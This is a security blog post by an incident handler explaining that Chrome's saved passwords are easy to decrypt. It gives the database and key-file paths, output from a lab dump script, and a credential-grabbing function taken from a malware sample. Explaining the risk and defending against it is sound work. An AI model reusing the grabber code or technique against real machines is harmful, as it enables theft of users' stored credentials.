Passwords... a so hot topic! Recently big players (Microsoft, Apple & Google) announced that they would like to suppress (or, at least, reduce) the use of classic passwords[1]. In the meantime, they remain the most common way to authenticate users against many online services. Modern Browsers offer lightweight password management tools ("vaults") that help users to save their passwords in a central repository. So they don't have to remember them, and they follow the golden rule that we, infosec people, are recommending for a long time: to not share passwords across services. But it is really safe?

I'm involved in a security incident where some administrative accounts for web applications have been probably leaked. During the investigations, I wrote a quick YARA rule to search for the suspicious accounts across files on the developers' computers. And I found a lot of them stored in the Chrome password databases. The default path for this file is:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\default|Login Data

This file is an SQLite database. Hopefully, passwords stored in this file are encrypted but it's pretty simple to decrypt them. But the AES key that is used to encrypt the passwords is stored in a JSON file:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State

I won't explain here how to decode this key and use it to decrypt all passwords. This is pretty straightforward to be performed in Python. Here is an example of dumping passwords from a lab Windows machine with Chrome:

C:\Users\xavier\Lab>python dumppass.py
Origin URL: https://selfoss.xxxxxxxxxxxx/
Action URL: https://selfoss.xxxxxxxxxxxx/
Username: xavier
Password: xxxxxxxx
Creation date: 2022-05-17 08:26:16.687562
Last Used: 2022-05-17 08:26:13.094214
==================================================
Origin URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/
Action URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/index.php
Username: admin
Password: xxxxxxxxxxxxxxxxxxxx
Creation date: 2022-05-17 08:49:44.385977
Last Used: 2022-05-17 08:49:41.002207
==================================================

If it's so easy to extract passwords from Chrome, many malware samples also implement this technique and exfiltrate your passwords. Here is a sample found this morning on VT:

def grabPassword(self):
    master_key = self.get_master_key(
        self.appdata+'\\Google\\Chrome\\User Data\\Local State')
    login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
    login = self.dir+self.sep+"Loginvault1.db"

    shutil.copy2(login_db, login)
    conn = sqlite3.connect(login)
    cursor = conn.cursor()
    with open(self.dir+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
        cursor.execute(
            "SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = self.decrypt_val(
                encrypted_password, master_key)
            if url != "":
                f.write(
                    f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
    cursor.close()
    conn.close()
    os.remove(login)

My recommendation is to not store your password in these browser vaults but use a real password manager instead! Most of them have plugins available to work with all common browsers and provide the same ease of use! Stay safe!

[1] https://www.bleepingcomputer.com/news/security/microsoft-apple-and-google-to-support-fido-passwordless-logins/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key